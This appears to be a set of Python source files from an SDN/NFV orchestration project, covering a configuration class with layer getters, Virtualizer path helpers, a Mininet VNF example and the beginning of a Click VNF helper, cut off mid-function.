DEFAULT_CONFIG_FILE = "escape-config.yaml" # relative to project root
"""Path of the default config file"""
def __init__ (self, default=None):
"""
Init configuration from given data or load it from the default config file.
:param default: default configuration
:type default: dict
:return: None
"""
# Store copy of project root directory
self.project_root = PROJECT_ROOT
self.__initiated = False
if default:
self.__config = default
else:
self.__initialize_from_file(path=self.DEFAULT_CONFIG_FILE)
@property
def in_initiated (self):
"""
Return True if config is initiated.
:return: initiated or not
:rtype: bool
"""
return self.__initiated
def add_cfg (self, cfg):
"""
Override configuration.
:param cfg: new configuration
:type cfg: dict
:return: None
"""
if isinstance(cfg, dict) and cfg:
self.__config = cfg
@staticmethod
def _load_cfg_file (path):
"""
Load external configuration from file. Support JSON and YAML format.
:param path: file path
:type path: str
:return: loaded configuration
:rtype: dict
"""
try:
with open(path) as f:
return yaml.safe_load(f)
except IOError:
quit_with_error('Default config file: %s is not found!' % path)
except (yaml.YAMLError, Exception) as e:
quit_with_error("An error occurred when load configuration: %s" % e)
def __initialize_from_file (self, path):
"""
Initialize the config from a file given by ``path``.
:param path: config file path
:type path: str
:return: None
"""
# Load file
path = os.path.join(PROJECT_ROOT, path)
log.debug("Load default config from file: %s" % path)
self.__config = self._load_cfg_file(path=path)
def load_config (self, config=None):
"""
Load static configuration from file if it exists, or leave the default intact.
.. note::
The CONFIG is updated per data under the Layer entries. This means that
the minimal amount of data that has to be given is the whole sequence or
collection under the appropriate key, e.g. the whole data under the
'STRATEGY' key in the 'orchestration' layer.
:param config: config file name relative to pox.py (optional)
:type config: str
:return: self
:rtype: :class:`ESCAPEConfig`
"""
if self.__initiated:
return self
if config:
# Config is set directly
log.debug("Load explicitly given config file: %s" % config)
else:
# No config file has been given
log.debug("No additional configuration has been given!")
try:
if config:
# Load file
cfg = self._load_cfg_file(path=os.path.abspath(config))
# Iterate over layer config
changed = False
for layer in cfg:
if layer in self.__config:
if self.__parse_part(self.__config[layer], cfg[layer]):
changed = True
if changed:
log.info("Running configuration has been updated from file!")
except IOError:
log.error("Additional configuration file not found: %s" % config)
# Register config into pox.core to be reachable for other future
# components -not used currently
self.__initiated = True
# core.register('CONFIG', self)
log.log(VERBOSE, "Running config:\n" + pprint.pformat(self.__config))
return self
def __parse_part (self, inner_part, loaded_part):
"""
Inner function to parse and check a part of configuration and update the
stored one according to the detected changes.
Uses recursion.
:param inner_part: part of inner representation of config (CONFIG)
:type inner_part: dict
:param loaded_part: part of loaded configuration (escape.config)
:type loaded_part: collections.Mapping
:return: original config is changed or not.
:rtype: bool
"""
changed = False
# If parsed part is not None or empty dict/tuple/list
if loaded_part:
# Iterating over the structure
for key, value in loaded_part.iteritems():
# If the loaded value is a dict
if isinstance(value, collections.Mapping):
# If we need to check deeper
if key in inner_part:
# Recursion
changed = self.__parse_part(inner_part[key], value)
# If no entry in CONFIG just copying
else:
# Add the new value(dict) to the inner part
inner_part[key] = value
# Config updated
changed = True
# If the loaded value is a str/tuple/list
else:
# If there is a default value for this key
if key in inner_part:
# If it is not the same
if isinstance(value, (tuple, list)):
if set(inner_part[key]) != set(value):
# Config overridden
inner_part[key] = value
changed = True
else:
if inner_part[key] != value:
# Config overridden
inner_part[key] = value
changed = True
else:
# Config updated
inner_part[key] = value
changed = True
return changed
def dump (self):
"""
Print the entire configuration in JSON format.
:return: None
"""
import json
print json.dumps(self.__config, indent=4)
def is_layer_loaded (self, layer):
"""
Return whether the given UNIFY layer is loaded or not.
:param layer: layer name
:type layer: str
:return: layer condition
:rtype: bool
"""
return self.__config[layer].get('LOADED', False)
def set_layer_loaded (self, layer):
"""
Set the given layer LOADED value.
:param layer: layer name
:type layer: str
:return: None
"""
if not self.__initiated:
self.load_config()
self.__config[layer]['LOADED'] = True
def __getitem__ (self, item):
"""
Can be used the config as a dictionary: CONFIG[...]
:param item: layer key
:type item: str
:return: layer config
:rtype: dict
"""
if not isinstance(item, basestring):
raise TypeError("Unsupported operand type: Layer name must be str")
elif item not in self.LAYERS:
raise KeyError("No layer is defined with the name: %s" % item)
else:
return self.__config[item]
def __setitem__ (self, key, value):
"""
Disable explicit layer config modification.
:raise: :any:`exceptions.RuntimeError`
"""
raise RuntimeError("Explicit layer config modification is not supported!")
def __delitem__ (self, key):
"""
Disable explicit layer config deletion.
:raise: :any:`exceptions.RuntimeError`
"""
raise RuntimeError("Explicit layer config deletion is not supported!")
def get_project_root_dir (self):
"""
Return the absolute path of project dir.
:return: path of project dir
:rtype: str
"""
return self.project_root
##############################################################################
# Mapping related getters
##############################################################################
def get_mapping_enabled (self, layer):
"""
Return whether the mapping process is enabled for the ``layer`` or not.
:param layer: layer name
:type layer: str
:return: enabled value (default: True)
:rtype: bool
"""
try:
return self.__config[layer]['MAPPER']['mapping-enabled']
except KeyError:
return True
def get_mapping_config (self, layer):
"""
Return the mapping config for the ``layer``.
:param layer: layer name
:type layer: str
:return: config parameters for main mapper function (default: empty dict)
:rtype: dict
"""
try:
return self.__config[layer]['MAPPER']['mapping-config']
except (KeyError, AttributeError):
return {}
def get_trial_and_error (self, layer):
"""
Return the trial-and-error setting for the ``layer``.
:param layer: layer name
:type layer: str
:return: config parameters for trial_and_error function (default: false)
:rtype: bool
"""
try:
return self.__config[layer]['MAPPER']['trial_and_error']
except (KeyError, AttributeError):
return False
def get_strategy (self, layer):
"""
Return with the Strategy class of the given layer.
:param layer: layer name
:type layer: str
:return: Strategy class
:rtype: :any:`AbstractMappingStrategy`
"""
try:
return getattr(importlib.import_module(
self.__config[layer]['STRATEGY']['module']),
self.__config[layer]['STRATEGY']['class'], None)
except (KeyError, AttributeError, TypeError):
return None
def get_mapper (self, layer):
"""
Return with the Mapper class of the given layer.
:param layer: layer name
:type layer: str
:return: Mapper class
:rtype: :any:`AbstractMapper`
"""
try:
return getattr(importlib.import_module(
self.__config[layer]['MAPPER']['module']),
self.__config[layer]['MAPPER']['class'], None)
except (KeyError, AttributeError, TypeError):
return None
def get_mapping_processor (self, layer):
"""
Return with the Validator class of the given layer.
:param layer: layer name
:type layer: str
:return: Validator class
:rtype: :any:`AbstractMappingDataProcessor`
"""
try:
return getattr(importlib.import_module(
self.__config[layer]['PROCESSOR']['module']),
self.__config[layer]['PROCESSOR']['class'], None)
except (KeyError, AttributeError, TypeError):
return None
def get_processor_enabled (self, layer):
"""
Return whether the mapping post-processor is enabled for the ``layer`` or not.
:param layer: layer name
:type layer: str
:return: enabled value (default: False)
:rtype: bool
"""
try:
return self.__config[layer]['PROCESSOR']['enabled']
except KeyError:
return False
def get_threaded (self, layer):
"""
Return whether the mapping strategy needs to run in a separate thread
or not. If the value is not defined, return False.
:param layer: layer name
:type layer: str
:return: threading value
:rtype: bool
"""
try:
return self.__config[layer]['STRATEGY']['THREADED']
except KeyError:
return False
##############################################################################
# REST_API layer getters
##############################################################################
def get_rest_api_resource_class (self, layer):
"""
"""
try:
return getattr(importlib.import_module(
self.__config['REST-API']['resources'][layer]['module']),
self.__config['REST-API']['resources'][layer]['class'], None)
except KeyError:
return None
def get_rest_api_prefix (self):
try:
return self.__config['REST-API']['prefix']
except KeyError:
return None
def get_rest_api_config (self, layer):
try:
cfg = self.__config['REST-API']['resources'][layer].copy()
del cfg['module']
del cfg['class']
return cfg
except KeyError:
return {}
def get_rest_api_host (self):
try:
return self.__config['REST-API'].get('host')
except KeyError:
return None
def get_rest_api_port (self):
try:
return self.__config['REST-API'].get('port')
except KeyError:
return None
def get_rest_api_resource_params (self, layer):
"""
Return the Cf-Or API params for agent request handler.
:return: params
:rtype: dict
"""
try:
return self.__config['REST-API']['resources'][layer]
except KeyError:
return {}
def get_rest_api_user(self):
try:
return self.__config['REST-API'].get('auth_user')
except KeyError:
return None
def get_rest_api_secret(self):
try:
return self.__config['REST-API'].get('auth_secret')
except KeyError:
return None
##############################################################################
# SERVICE layer getters
##############################################################################
def get_sas_request_delay (self):
"""
Return the default delay value for service request parsing from file.
:return: delay
:rtype: int
"""
try:
return int(
self.__config[SERVICE]['SCHEDULED_SERVICE_REQUEST_DELAY'])
except (KeyError, ValueError):
return 0
##############################################################################
# Virtualizer getters
##############################################################################
def get_api_virtualizer (self, layer):
"""
Return the type of the assigned Virtualizer.
:return: type of the Virtualizer as in :any:`VirtualizerManager`
:rtype: str
"""
try:
return self.__config['REST-API']['resources'][layer]['virtualizer_type']
except (KeyError, AttributeError, TypeError):
return None
def get_virtualizer_params (self, layer):
try:
return self.__config['REST-API']['resources'][layer][
'virtualizer_params']
except KeyError:
return {}
##############################################################################
# ADAPTATION layer getters
##############################################################################
def get_vnfm_enabled (self):
"""
Return whether the VNFM component is enabled.
:return: VNFM is enabled or not
:rtype: bool
"""
try:
return self.__config[ADAPT]['VNFM']['enabled']
except KeyError:
return False
def get_vnfm_config (self):
"""
Return the VNFM external component configuration.
:return: VNFM config
:rtype: dict
"""
try:
params = self.__config[ADAPT]['VNFM'].copy()
return params
except KeyError:
return {}
def get_callback_config (self):
"""
Return the common callback configuration for :class:`CallbackManager`.
:return: callback manager config
:rtype: dict
"""
try:
return self.__config[ADAPT]['CALLBACK'].copy()
except KeyError:
return {}
def get_component (self, component, parent=None):
"""
Return with the class of the adaptation component.
:param component: component name
:type component: str
:param parent: define the parent of the actual component's configuration
:type parent: dict
:return: component class
"""
try:
comp = self.__config[ADAPT][component] if parent is None \
else parent[component]
return getattr(importlib.import_module(comp['module']), comp['class'])
except KeyError:
return None
def get_component_params (self, component, parent=None):
"""
Return with the initial parameters of the given component defined in CONFIG.
The param's name must be identical to the attribute name of the component's
constructor.
:param component: component name
:type component: str
:param parent: define the parent of the actual component's configuration
:type parent: dict
:return: initial params
:rtype: dict
"""
try:
params = self.__config[ADAPT][component] \
if parent is None else parent[component]
except KeyError:
return {}
try:
# FIXME - what if there are no module and class???
params = params.copy()
del params['module']
del params['class']
except KeyError:
pass
return params
def get_managers (self):
"""
Return the default DomainManagers for initialization on start.
:return: list of :any:`AbstractDomainManager` names
:rtype: list
"""
try:
return self.__config[ADAPT]['MANAGERS']
except KeyError:
return ()
def get_manager_by_domain (self, domain):
"""
Return the manager configuration that belongs to the given domain.
:param domain: domain name
:type domain: str
:return: domain manager config
:rtype: dict
"""
if domain in self.__config[ADAPT]:
return self.__config[ADAPT][domain]
for mgr in self.__config[ADAPT].itervalues():
if type(mgr) is not dict:
continue
if mgr.get('domain_name', None) == domain:
return mgr
def get_internal_manager (self):
"""
Return with the Manager class which is detected as the Manager of the
locally emulated Mininet-based network.
Based on the IS_INTERNAL_MANAGER attribute of the defined DomainManager
classes in the global config.
:return: local manager name(s)
:rtype: dict
"""
internal_mgrs = []
for item in self.__config[ADAPT].itervalues():
if isinstance(item, dict) and 'module' in item and 'class' in item:
try:
mgr_class = getattr(importlib.import_module(item['module']),
item['class'])
if mgr_class.IS_INTERNAL_MANAGER:
internal_mgrs.append(
item['domain_name'] if 'domain_name' in item else
mgr_class.DEFAULT_DOMAIN_NAME)
except (KeyError, AttributeError, TypeError):
return None
return internal_mgrs if internal_mgrs else None
def get_external_managers (self):
"""
Return with the Manager classes which are detected as external managers.
Based on the IS_EXTERNAL_MANAGER attribute of the defined DomainManager
classes in the global config.
:return: external manager name(s)
:rtype: dict
"""
external_mgrs = []
for item in self.__config[ADAPT].itervalues():
if isinstance(item, dict) and 'module' in item and 'class' in item:
try:
mgr_class = getattr(importlib.import_module(item['module']),
item['class'])
if mgr_class.IS_EXTERNAL_MANAGER:
external_mgrs.append(
item['domain_name'] if 'domain_name' in item else
mgr_class.DEFAULT_DOMAIN_NAME)
except (KeyError, AttributeError, TypeError):
return None
return external_mgrs if external_mgrs else None
def reset_domains_after_shutdown (self):
"""
Return with the shutdown strategy to reset domain or not.
:return: reset domain after shutdown or not (default: True)
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment'][
'RESET-DOMAINS-AFTER-SHUTDOWN']
except KeyError:
return True
def clear_domains_after_shutdown (self):
"""
Return with the shutdown strategy to clear domain or not.
:return: clear domain after shutdown or not (default: True)
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment'][
'CLEAR-DOMAINS-AFTER-SHUTDOWN']
except KeyError:
return True
def reset_domains_before_install (self):
"""
Return with the pre-deploy strategy to reset domain or not.
:return: reset domain before install or not (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment'][
'RESET-DOMAINS-BEFORE-INSTALL']
except KeyError:
return False
def rollback_on_failure (self):
"""
:return: Return whether rollback mode is enabled.
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment']['ROLLBACK-ON-FAILURE']
except KeyError:
return False
def domain_deploy_delay (self):
"""
:return: Return explicit delay value injected before deployment.
:rtype: int
"""
try:
return self.__config[ADAPT]['deployment']['DOMAIN-DEPLOY-DELAY']
except KeyError:
return 0
def flowrule_stitching (self):
try:
return self.__config[ADAPT]['deployment'][
'ENABLE-FLOWRULE-STITCHING']
except KeyError:
return True
def use_remerge_update_strategy (self):
"""
Return True if the re-merge update strategy is enabled in DoV updating
instead of using the straightforward step-by-step updating.
:return: re-merge strategy is enabled or not (default: True)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['USE-REMERGE-UPDATE-STRATEGY']
except KeyError:
return True
def use_status_based_update (self):
"""
Return True if the status based update strategy is enabled.
This approach updates the DoV as a first step and uses element status to update
the domain.
:return: status update strategy is enabled or not (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['USE-STATUS-BASED-UPDATE']
except KeyError:
return False
def ensure_unique_bisbis_id (self):
"""
Return with the ID generation strategy for nodes.
If it is set, id of nodes will be generated with the domain name as a
postfix to ensure unique id globally.
:return: id generation strategy (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['ENSURE-UNIQUE-BiSBiS-ID']
except KeyError:
return False
def ensure_unique_vnf_id (self):
"""
Return with the ID generation strategy for VNFs.
If it is set, id of nodes will be generated with the container BiSBiS node
id as a postfix to ensure unique id globally.
:return: id generation strategy (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['ENSURE-UNIQUE-VNF-ID']
except KeyError:
return False
def one_step_update (self):
"""
:return: Return whether one-step update is enabled.
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['ONE-STEP-UPDATE']
except KeyError:
return True
def no_poll_during_deployment (self):
"""
:return: Return whether polling is disabled during service deployment
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['NO-POLL-DURING-DEPLOYMENT']
except KeyError:
return True
def get_sdn_topology (self):
"""
Return the path of the SDN topology config file.
:return: path of topology config file
:rtype: str
"""
try:
# Project root dir relative to this module which is/must be under root
# util/escape/ext/pox/root
return os.path.abspath(
os.path.join(self.get_project_root_dir(),
self.__config[ADAPT]['SDN']['TOPOLOGY']['path']))
except KeyError:
return None
##############################################################################
# INFRASTRUCTURE layer getters
##############################################################################
def get_mn_network_opts (self):
"""
Return the optional Mininet parameters for initiation.
:return: optional constructor params (default: empty dict)
:rtype: dict
"""
try:
mn_opts = self.__config[INFR]['NETWORK-OPTS']
return mn_opts if mn_opts is not None else {}
except KeyError:
return {}
def get_mininet_topology (self):
"""
Return the path of the Mininet topology script.
:return: topology file path
"""
try:
# Project root dir relative to this module which is/must be under pox/ext
return os.path.abspath(os.path.join(self.get_project_root_dir(),
self.__config[INFR]['TOPO']))
except KeyError:
return None
def get_fallback_topology (self):
"""
Return the fallback topology class.
:return: fallback topo class
:rtype: :any:`AbstractTopology`
"""
try:
return getattr(importlib.import_module(
self.__config[INFR]['FALLBACK-TOPO']['module']),
self.__config[INFR]['FALLBACK-TOPO']['class'], None)
except KeyError:
return None
def get_clean_after_shutdown (self):
"""
Return whether a cleaning process needs to be done after shutdown or not.
:return: cleanup (default: False)
:rtype: bool
"""
try:
return strtobool(str(self.__config[INFR]['SHUTDOWN-CLEAN']))
except KeyError:
return False
def get_SAP_xterms (self):
"""
Return whether xterms need to be initiated for the SAPs.
:return: xterms
:rtype: bool
"""
try:
return self.__config[INFR]['SAP-xterms']
except (KeyError, AttributeError, TypeError):
return True
def get_nfib_enabled (self):
"""
Return whether the NFIB component needs to be initialized.
:return: NFIB enabled or not
"""
try:
return self.__config[ORCHEST]['NFIB']['enabled']
except (KeyError, AttributeError, TypeError):
return False
def get_neo4j_host_port (self):
"""
Return the host and port values for the Neo4j server.
:return: host and port
:rtype: tuple
"""
try:
return (self.__config[ORCHEST]['NFIB'].get("host"),
self.__config[ORCHEST]['NFIB'].get("port"))
except (KeyError, AttributeError, TypeError):
return False
def get_manage_neo4j_service (self):
"""
Return whether the neo4j service needs to be managed by ESCAPE.
:return: manage_neo4j_service
:rtype: bool
"""
try:
return self.__config[ORCHEST]['NFIB']['manage-neo4j-service']
except (KeyError, AttributeError, TypeError):
return False
def get_Controller_params (self):
"""
Return the additional parameters which are forwarded to the constructor of
the specific :any:`InternalControllerProxy` class during Mininet building.
:return: additional parameters as a dict (default: empty dict)
:rtype: dict
"""
try:
cfg = self.__config[INFR]['Controller']
return cfg if cfg is not None else {}
except (KeyError, AttributeError, TypeError):
return {}
def get_EE_params (self):
"""
Return the additional parameters which are forwarded to the constructor of
the :class:`mininet.node.EE` class during Mininet building.
:return: additional parameters as a dict (default: empty dict)
:rtype: dict
"""
try:
cfg = self.__config[INFR]['EE']
return cfg if cfg is not None else {}
except (KeyError, AttributeError, TypeError):
return {}
def get_Switch_params (self):
"""
Return the additional parameters which are forwarded to the constructor of
the specific :class:`mininet.node.Switch` class during Mininet building.
:return: additional parameters as a dict (default: empty dict)
:rtype: dict
"""
try:
cfg = self.__config[INFR]['Switch']
return cfg if cfg is not None else {}
except (KeyError, AttributeError, TypeError):
return {}
def get_SAP_params (self):
"""
Return the additional parameters which are forwarded to the constructor of
the :class:`mininet.node.Host` class during Mininet building.
:return: additional parameters as a dict (default: empty dict)
:rtype: dict
"""
try:
cfg = self.__config[INFR]['SAP']
return cfg if cfg is not None else {}
except (KeyError, AttributeError, TypeError):
return {}
def get_Link_params (self):
"""
Return the additional parameters which are forwarded to the constructor of
the :class:`mininet.node.Link` class during Mininet building.
:return: additional parameters as a dict (default: empty dict)
:rtype: dict
"""
try:
cfg = self.__config[INFR]['Link']
return cfg if cfg is not None else {}
except (KeyError, AttributeError, TypeError):
return {}
##############################################################################
# Visualizations layer getters
##############################################################################
def get_visualization_url (self):
"""
Return the url of the remote Visualization server.
:return: url
:rtype: str
"""
try:
return self.__config['visualization']['url']
except KeyError:
return None
def get_visualization_rpc (self):
"""
Return the RPC endpoint name of the remote Visualization server.
:return: rpc name
:rtype: str
"""
try:
return self.__config['visualization']['rpc']
except KeyError:
return None
def get_visualization_instance_id (self):
"""
Return the instance id of the current ESCAPEv2.
:return: instance id
:rtype: str
"""
try:
return self.__config['visualization']['instance_id']
except KeyError:
return None
def get_visualization_params (self):
"""
Return the additional request params for the remote Visualization server.
:return: params
:rtype: dict
"""
try:
return self.__config['visualization']['params']
except KeyError:
return {}
def get_visualization_headers (self):
"""
Return the request headers used towards the remote Visualization server.
:return: headers
:rtype: dict
"""
try:
return self.__config['visualization']['headers']
except KeyError:
return {}
def get_domain_url (self, domain=None):
"""
Assemble the URL of the given domain based on the global configuration.
:param domain: domain name
:type domain: str
:return: url
:rtype: str
"""
if domain is None:
host = self.get_rest_api_host()
port = self.get_rest_api_port()
prefix = self.get_rest_api_prefix()
return "http://%s:%s/%s" % (host if host else "localhost",
port if port else "",
prefix if prefix else "")
mgr = self.get_manager_by_domain(domain=domain)
if mgr is None:
log.warning("DomainManager config is not found for domain: %s" % domain)
return
try:
ra = mgr['adapters']['REMOTE']
# return os.path.join(ra['url'], ra['prefix'])
return urlparse.urljoin(ra['url'], ra['prefix'])
except KeyError:
return
# Load default config right after import
CONFIG = ESCAPEConfig()
```
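A sketch of how the layer getters above are typically consumed (assuming the POX/ESCAPE runtime is importable so that the global `CONFIG` singleton has been created):
```python
from escape.util.config import CONFIG
from escape.service import LAYER_NAME as SERVICE

CONFIG.load_config()                           # no-op after the first call
if CONFIG.get_mapping_enabled(SERVICE):        # per-layer mapping switch
    mapper_cls = CONFIG.get_mapper(SERVICE)    # Mapper class or None
    strategy_cls = CONFIG.get_strategy(SERVICE)
    mapping_opts = CONFIG.get_mapping_config(SERVICE)  # kwargs for the mapper
```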
#### File: escape/util/virtualizer_helper.py
```python
import ast
import logging
import re
log = logging.getLogger("virt_helper")
NF_PATH_TEMPLATE = "/virtualizer/nodes/node[id=%s]/NF_instances/node[id=%s]"
# Use ? modifier after .* to define a non-greedy matching and skip ports
NODE_NF_PATTERN = r'.*nodes/node\[id=(.*?)\]/NF_instances/node\[id=(.*?)\]'
def get_nf_from_path (path):
"""
Return the NF id from a Virtualizer path.
:param path: path
:type path: str
:return: extracted NF name
:rtype: str
"""
mapping_regex = re.compile(NODE_NF_PATTERN)
match = mapping_regex.match(path)
if match is None:
log.warning("Wrong object format: %s" % path)
return
return mapping_regex.match(path).group(2)
def get_bb_nf_from_path (path):
"""
Return the BiSBiS node and NF id from a Virtualizer path.
:param path: path
:type path: str
:return: extracted BB and NF name
:rtype: tuple
"""
mapping_regex = re.compile(NODE_NF_PATTERN)
match = mapping_regex.match(path)
if match is None:
log.warning("Wrong object format: %s" % path)
return
return mapping_regex.match(path).group(1, 2)
def detect_bb_nf_from_path (path, topo):
"""
Return the existing BiSBiS and NF id referred to by the given path from the topology.
:param path: path
:type path: str
:param topo: topology object
:type topo: :class:`NFFG`
:return: extracted BiSBiS and NF id
:rtype: tuple
"""
bb, nf = get_bb_nf_from_path(path=path)
if bb not in topo or nf not in topo:
log.warning("Missing requested element: %s on %s from topo!" % (nf, bb))
return None, None
log.debug("Detected NF: %s on %s" % (nf, bb))
return bb, nf
def get_nfs_from_info (info):
"""
Return NF IDs defined in Info request.
:param info: Info object
:type info: :class:`Info`
:return: NF IDs
:rtype: set
"""
nfs = set()
log.debug("Extract NFs from info request...")
for attr in (getattr(info, e) for e in info._sorted_children):
for element in attr:
if hasattr(element, "object"):
nf = get_nf_from_path(element.object.get_value())
if nf is not None:
nfs.add(nf)
else:
log.warning("Missing NF from element:\n%s" % element.object.xml())
else:
log.warning("Missing 'object' from element:\n%s" % element.xml())
return nfs
def strip_info_by_nfs (info, nfs):
"""
Remove Info element from given Info structure where the referred NF is not
in given nfs collection.
:param info: Info object
:type info: :class:`Info`
:param nfs: collection of NF IDs
:type nfs: list or set
:return: stripped Info object
:rtype: :class:`Info`
"""
info = info.yang_copy()
for attr in (getattr(info, e) for e in info._sorted_children):
deletable = []
for element in attr:
if hasattr(element, "object"):
nf_id = get_nf_from_path(element.object.get_value())
if nf_id not in nfs:
deletable.append(element)
for d in deletable:
attr.remove(d)
return info
def is_empty (virtualizer, skipped=('version', 'id')):
"""
Return True if the given Virtualizer object has no important child element.
:param virtualizer: virtualizer object
:type virtualizer: :class:`Virtualizer`
:param skipped: non-significant child names
:type skipped: tuple or list
:return: is empty
:rtype: bool
"""
next_child = virtualizer.get_next()
while next_child is not None:
# Skip version tag (old format) and id (new format)
if next_child.get_tag() not in skipped:
return False
else:
next_child = next_child.get_next()
return True
def is_identical (base, new):
"""
Return True if the base and new Virtualizer objects are identical.
:param base: first Virtualizer object
:type base: :class:`Virtualizer`
:param new: second Virtualizer object
:type new: :class:`Virtualizer`
:return: is identical
:rtype: bool
"""
return is_empty(virtualizer=base.diff(new))
def _res_parser (raw_str):
try:
digits = filter(lambda c: c.isdigit() or c == '.', raw_str)
return ast.literal_eval(digits)
except SyntaxError:
pass
```
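The path-parsing helpers above can be exercised directly; the path string below is made up purely for illustration, following `NODE_NF_PATTERN`:
```python
# Hypothetical Virtualizer path in the format matched by NODE_NF_PATTERN.
path = ("/virtualizer/nodes/node[id=bisbis-1]"
        "/NF_instances/node[id=fwd-2]/ports/port[id=1]")

print(get_nf_from_path(path))     # -> 'fwd-2'
print(get_bb_nf_from_path(path))  # -> ('bisbis-1', 'fwd-2')
```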
#### File: mininet/examples/vnftest-iminds.py
```python
from mininet.net import Mininet, MininetWithControlNet
from mininet.node import Controller, RemoteController
from mininet.cli import CLI
from mininet.log import setLogLevel, info
class InbandController( RemoteController ):
def checkListening( self ):
"Overridden to do nothing."
return
def netWithVNFs(netconf = False):
"Create an empty network and add nodes to it."
#ctl = InbandController( 'ctl', ip='192.168.123.1' )
#ctl = InbandController( 'ctl', ip='127.0.0.1' )
#net = MininetWithControlNet( )
net = MininetWithControlNet( controller=Controller, autoSetMacs=True )
#net = Mininet( controller=Controller )
info( '*** Adding controller\n' )
ctl = net.addController( 'c0' , controller=RemoteController )
#import pdb; pdb.set_trace();
info( '*** Adding hosts \n' )
h1 = net.addHost( 'h1')
h2 = net.addHost( 'h2')
info( '*** Adding VNFs \n' )
if netconf:
ee1 = net.addEE( 'ee1' )
ee1.setVNF(vnf_name='netconf')
ee2 = net.addEE( 'ee2' )
ee2.setVNF(vnf_name='netconf')
#[ exe1_sw, exe1_container ] = net.addManagedExe( 'exe1', nintf=5)
#exe1_container.cmd = netconf.makeNetConfCmd()
else:
ee1 = net.addEE( 'ee1',cpu=0.1)
#ee1.setVNF(vnf_name='fakeLoad', cpu='8', mem='5MB')
ee1.setVNF(vnf_name='simpleForwarder', device=ee1.name+'_eth1',name=ee1.name)
ee2 = net.addEE( 'ee2',cpu=0.1)
#example for NAT with two ports connected to internal hosts (private addresses) and one port connected to the Internet (public address)
device=[{'index':0,'name':'eth1','ip1':'1.0.0.1','ip2':'172.16.58.3'},{'index':1,'name':'eth2','ip1':'172.16.31.10','ip2':'172.16.31.10'}]
public={'index':2,'name':'eth2'}
ee2.setVNF(vnf_name='nat',device=device,public=public)
# ee2.setVNF(vnf_name='simpleObservationPoint', name=ee2.name)
#ee2.setVNF(vnf_name='fakeLoad', cpu='8', mem='5MB')
#ee2.setVNF(vnf_name='lookbusy',
# mem_util='5MB', cpu_util='8-20', cpu_mode='curve',
# cpu_curve_period='5m', cpu_curve_peak='2m' )
info( '*** Adding switches\n' )
s3 = net.addSwitch( 's3' )
s4 = net.addSwitch( 's4' )
info( '*** Creating links\n' )
net.addLink( h1, s3 )
net.addLink( h2, s4 )
net.addLink( s3, s4 )
if netconf:
net.addLink( exe1_sw, s3 )
else:
net.addLink( ee1, s3 )
net.addLink( ee2, s4 )
info( '*** Starting network\n' )
net.start()
info( '*** Running CLI\n' )
CLI( net )
info( '*** Stopping network' )
net.stop()
def add_VNF():
""" add VNFs to catalog (required parameters should be given) """
from mininet.vnfcatalogiminds import Catalog
#1. First single Click elements are added to the DB
Catalog().add_VNF(vnf_name='FromDevice',vnf_type='Click')
Catalog().add_VNF(vnf_name='ToDevice',vnf_type='Click')
Catalog().add_VNF(vnf_name='Queue',vnf_type='Click')
Catalog().add_VNF(vnf_name='Tee',vnf_type='Click')
#Catalog().add_VNF(vnf_name='Counter',vnf_type='Click',clickPath='/home/click',
# clickSource=['elements/standard/counter.cc','elements/standard/counter.cc'])
Catalog().add_VNF(vnf_name='Counter',vnf_type='Click')
Catalog().add_VNF(vnf_name='Classifier',vnf_type='Click')
Catalog().add_VNF(vnf_name='IPClassifier',vnf_type='Click')
Catalog().add_VNF(vnf_name='ICMPPingSource',vnf_type='Click')
Catalog().add_VNF(vnf_name='ARPQuerier',vnf_type='Click')
Catalog().add_VNF(vnf_name='AggregateIPFlows',vnf_type='Click')
Catalog().add_VNF(vnf_name='RFC2507Comp',vnf_type='Click')
Catalog().add_VNF(vnf_name='RFC2507Decomp',vnf_type='Click')
Catalog().add_VNF(vnf_name='IPAddRewriter',vnf_type='Click')
#2. Then the VNFs composed of several Click elements are added to the DB
Catalog().add_VNF(vnf_name='simpleForwarder',vnf_type='Click',description='receive on the data interface and loop back the packet')
Catalog().add_VNF(vnf_name='simpleObservationPoint',vnf_type='Click',description='A simple observation point in click')
Catalog().add_VNF(vnf_name='headerCompressor',vnf_type='Click',description='Compress IPv4/TCP headers as defined in RFC2507')
Catalog().add_VNF(vnf_name='headerDecompressor',vnf_type='Click',description='Decompress IPv4/TCP headers as defined in RFC2507')
Catalog().add_VNF(vnf_name='nat',vnf_type='Click',description='Provide the functionality of basic network address translator')
if __name__ == '__main__':
add_VNF()
setLogLevel( 'info' )
netWithVNFs()
```
#### File: mininet/mininet/clickhelper.py
```python
import sys
import copy
import subprocess
import atexit
from vnfcatalog import Catalog
class ClickHelper(object):
"""
Helper class for starting Click-based VNFs.
VNF info is read from VNF catalog.
"""
def __init__ (self):
self.vnf_type = None
self._parse_args()
self.catalog = Catalog()
self.click_proc = None
atexit.register(self.kill_click_proc)
def _parse_args (self):
"""
Loading command line args coming from netconfd to a dictionary.
Format: arg1=argval1 arg2=argval2 ...
"""
self.opts = dict(map(lambda x: x.split('='), sys.argv[1:]))
self.updateDevs()
def updateDevs (self):
"""
Update devs list based on opts (ex: dev_x=uny_y).
"""
devs = [(k, v) for k, v in self.opts.iteritems() if k.startswith('dev')]
devs = dict(devs)
devlist = []
for k in sorted(devs.keys()):
devlist.append(devs[k])
self.opts.update({'devs': devlist})
def setVNFType (self):
"""
Set vnf_type based on opts.
"""
try:
self.vnf_type = self.opts['type']
except KeyError:
self.vnf_type = None
return self.vnf_type
def getVNFType (self):
return self.vnf_type
def logVNFType (self):
if self.vnf_type:
# print self.vnf_type
with open('/tmp/vnftype.log', 'w') as f:
f.write(str(self.vnf_type))
f.close()
def initVNF (self):
"""
Initialize VNF, make command.
"""
self.setVNFType()
opts = copy.deepcopy(self.opts)
startCmd = self.catalog.make_cmd(opts['type'], name=opts['vnf_id'],
**self.opts)
startCmd = startCmd.replace('&', ' ')
self.startCmd = startCmd
def getVNFCmd (self):
return self.startCmd
def logVNFCmd (self):
if self.startCmd:
print self.startCmd
with open('/tmp/vnfcmd.log', 'w') as f:
f.write(str(self.startCmd))
f.close()
def startVNF (self):
"""
